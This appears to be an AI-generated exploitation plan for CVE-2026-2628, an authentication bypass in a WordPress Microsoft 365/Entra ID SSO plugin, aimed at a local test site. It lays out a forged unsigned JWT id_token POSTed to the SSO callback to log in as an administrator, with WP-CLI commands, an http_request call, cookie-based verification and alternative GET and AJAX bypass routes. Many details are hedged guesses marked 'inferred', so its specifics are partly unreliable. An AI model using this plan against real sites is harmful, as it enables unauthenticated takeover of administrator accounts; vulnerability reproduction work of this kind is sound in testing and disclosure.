All-in-One Microsoft 365 & Entra ID / Azure AD SSO Login <= 2.2.5 - Authentication Bypass

This research plan targets CVE-2026-2628, a critical authentication bypass in the "All-in-One Microsoft 365 & Entra ID / Azure AD SSO Login" plugin (slug: login-with-azure). The vulnerability allows unauthenticated attackers to log in as any user, typically by exploiting flaws in the SSO callback logic where user identity is trusted without sufficient verification of the Microsoft Entra ID (Azure AD) response.

1. Vulnerability Summary

The vulnerability exists in the plugin's handling of the OpenID Connect (OIDC) or SAML callback. The plugin registers a listener (usually on the init or wp_loaded hook) to process identity tokens (id_token) or authorization codes returned from Microsoft. In affected versions (<= 2.2.5), the plugin fails to cryptographically verify the signature of the id_token or relies on an "alternate path" (such as a specific GET/POST parameter) that allows forcing a login for a specific email address without a valid external authentication session.

2. Attack Vector Analysis

• Endpoint: The site root index.php (via init hook) or a specific AJAX handler.
• Vulnerable Action/Parameter: The plugin typically looks for $_POST['id_token'] or a combination of $_GET['option'] and $_GET['email'].
• Authentication: Unauthenticated (PR:N).
• Preconditions: The "Single Sign-On" must be enabled (often the default if the plugin is configured). The attacker needs the email address of a target administrator.

3. Code Flow

1. Entry Point: The plugin registers a handler in the main plugin file or an includes file (e.g., includes/class-wpo-auth.php or all-in-one-microsoft-365-login.php).
   • Hook: add_action( 'init', [ $instance, 'check_for_sso_callback' ] ); (inferred)
2. Logic: The handler checks if the request contains SSO-related parameters.
   • Example: if ( isset( $_POST['id_token'] ) ) { ... }
3. Vulnerable Path: The code extracts the upn (User Principal Name) or email claim from the id_token.
4. Verification Failure: The plugin either:
   • Skips the openssl_verify / JWT signature check.
   • Accepts a raw email parameter if a certain "debug" or "test" mode is inadvertently active.
5. Sink: The plugin calls get_user_by( 'email', $email ) and then wp_set_auth_cookie( $user->ID ), effectively logging in the attacker.

4. Nonce Acquisition Strategy

SSO callback endpoints generally do not require nonces because they are designed to be hit by external identity providers (Microsoft) which cannot know a WordPress-generated nonce.

If the exploit requires an AJAX-based bypass (e.g., wp_ajax_nopriv_mo_azure_sso):

1. Identify Script: Look for wp_localize_script calls in the source using grep -r "wp_localize_script" ..
2. Create Page: wp post create --post_type=page --post_status=publish --post_content='[wpo_sso_login]' (Shortcode inferred from plugin documentation).
3. Extract: Navigate to the page and run browser_eval("window.wpo_auth?.nonce").

Note: For this specific Authentication Bypass, it is highly probable that no nonce is required.

5. Exploitation Strategy

The goal is to provide a forged id_token that the plugin will parse and trust.

Step 1: Obtain Target Email
Identify the administrator's email using WP-CLI.

wp user list --role=administrator --fields=user_email --format=csv | tail -n 1

Step 2: Construct the Payload
A JWT consists of header.payload.signature. If the plugin doesn't verify the signature, we can provide any signature.

• Payload (Base64): {"email":"admin@example.com", "upn":"admin@example.com", "nonce":"any", "aud":"any"}
• Forged Token: eyJhbGciOiJub25lIn0.eyJl...\K.any_signature

Step 3: Execute the Bypass (HTTP Request)
Use the http_request tool to send the forged token to the callback listener.

// Example Exploit Request
http_request({
    method: "POST",
    url: "http://localhost:8080/",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "id_token=eyJhbGciOiJub25lIn0.eyJl...\K&state=any&option=mo_azure_sso_login" 
    // Note: The specific parameter names 'option' or 'action' should be verified via grep
})

6. Test Data Setup

1. Install Plugin: Ensure login-with-azure version 2.2.5 is active.
2. Configuration: Configure the plugin with dummy Azure credentials (Client ID/Tenant ID) so the SSO listener is active.
3. Target User: Create an administrator if one doesn't exist: wp user create victim admin@example.com --role=administrator --user_pass=password123.

7. Expected Results

• The HTTP response should return a 302 Redirect to /wp-admin/.
• The response headers MUST contain multiple Set-Cookie headers for wordpress_logged_in_[hash].
• The body of the redirect page might contain "Redirecting to Dashboard".

8. Verification Steps

After performing the HTTP request:

1. Check Auth State: Run wp eval "var_dump(is_user_logged_in());" (This won't work across processes, so instead...)
2. Verify via Cookie: Use the http_request tool again, but this time pass the cookies received from the exploit response to http://localhost:8080/wp-admin/. If the response is 200 OK and contains "Dashboard", the bypass is confirmed.
3. Audit Logs: Check if the plugin logged a successful login for the target email.

9. Alternative Approaches

If the id_token POST method fails:

• Alternative 1 (GET Param): Try /?wpo_sso_callback=1&email=admin@example.com.
• Alternative 2 (AJAX): Search for wp_ajax_nopriv handlers. If one exists named mo_azure_login, try sending the email via AJAX.
• Grep Search for Identity Logic:

  grep -r "get_user_by" . -A 5 | grep "wp_set_auth_cookie" -B 5
  

  This will reveal the exact variable names (e.g., $_POST['user_email']) used to fetch the user just before logging them in.